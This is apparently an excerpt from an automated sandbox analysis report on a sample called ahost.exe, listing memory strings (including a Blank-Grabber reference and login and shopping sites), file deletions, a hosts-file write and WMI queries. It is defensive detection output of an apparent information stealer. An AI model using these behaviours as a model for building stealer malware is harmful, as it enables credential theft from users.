              Source: powershell.exe, 00000046.00000002.1646857023.0000017B02214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: ahost.exe, 00000002.00000003.1605942422.000002162C2C4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871213413.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866866595.000002162C365000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C2C4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C36A000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1640893312.000002162C369000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C2CF000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1617356386.000002162C36A000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C364000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870964943.000002162C2D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: ahost.exe, 00000002.00000003.1549319883.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1605942422.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870964943.000002162C342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: ahost.exe, 00000002.00000002.1870511301.000002162C154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: ahost.exe, 00000002.00000003.1549319883.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1601685173.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1633476242.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1643405350.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870768302.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1613125448.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: ahost.exe, 00000002.00000003.1602387295.000002162C36A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: ahost.exe, 00000002.00000002.1874902804.000002162D8F8000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1618434399.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1602338590.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632068064.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1596519190.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1642271166.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1873852301.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866135475.000002162D05C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: ahost.exe, 00000002.00000002.1874902804.000002162D8D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 0000000C.00000002.1528551982.000001FBD11B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1715027533.0000017B11796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B03038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: ahost.exe, 00000002.00000002.1871698270.000002162C660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
              Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
              Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
              Source: ahost.exe, 00000002.00000002.1869730521.000002162BD00000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871595223.000002162C540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: ahost.exe, 00000002.00000003.1397661863.000002162B9B1000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
              Source: ahost.exe, 00000002.00000002.1878937308.00007FF8E78B8000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
              Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: ahost.exe, 00000002.00000003.1568400084.000002162CDB8000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1586364986.000002162CD08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1568240173.000002162C3C3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: ahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/produ
              Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1547191793.000002162C3DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
              Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: ahost.exe, 00000002.00000003.1579668380.000002162BE02000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1619630084.000002162BE11000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BE11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: ahost.exe, 00000002.00000003.1605942422.000002162C2C4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871213413.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866866595.000002162C365000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C2C4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C36A000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1640893312.000002162C369000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C2CF000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1617356386.000002162C36A000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C364000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870964943.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1602387295.000002162C36A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: ahost.exe, 00000002.00000002.1871698270.000002162C660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
              Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: ahost.exe, 00000002.00000003.1568400084.000002162CDB8000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1586364986.000002162CD08000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1874902804.000002162D8C0000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871989503.000002162C8B4000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1586364986.000002162CD00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/
              Source: ahost.exe, 00000002.00000003.1605942422.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866866595.000002162C365000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1640893312.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1551563607.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1867424193.000002162C3D6000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871320397.000002162C3DA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
              Source: ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1568240173.000002162C3C3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
              Source: ahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: ahost.exe, 00000002.00000003.1586364986.000002162CD17000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
              Source: ahost.exe, 00000002.00000003.1605942422.000002162C2C4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C2C4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1547191793.000002162C3F2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C2CF000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: ahost.exe, 00000002.00000002.1874902804.000002162D8F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1878093732.00007FF8E72E9000.00000004.00000001.01000000.00000010.sdmp, ahost.exe, 00000002.00000002.1877130678.00007FF8E6C2A000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: ahost.exe, 00000002.00000002.1878937308.00007FF8E78B8000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/)
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
              Source: ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: ahost.exe, 00000002.00000003.1549319883.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1605942422.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870964943.000002162C342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\user\Desktop\ahost.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NHPKIZUUSG.jpgJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\ZSSZYEFYMU.pdfJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\AFWAAFRXKO.docxJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\AFWAAFRXKO.docxJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\HTAGVDFUIE.mp3Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: cmd.exeProcess created: 73

              System Summary

              barindex
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8A3A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,104_2_00007FF7CF8A3A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8CB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,104_2_00007FF7CF8CB57C
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F92069D40_2_00007FF7F92069D4
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91E8BD00_2_00007FF7F91E8BD0
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91E10000_2_00007FF7F91E1000
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91FDACC0_2_00007FF7F91FDACC
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F92009380_2_00007FF7F9200938
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91F81540_2_00007FF7F91F8154
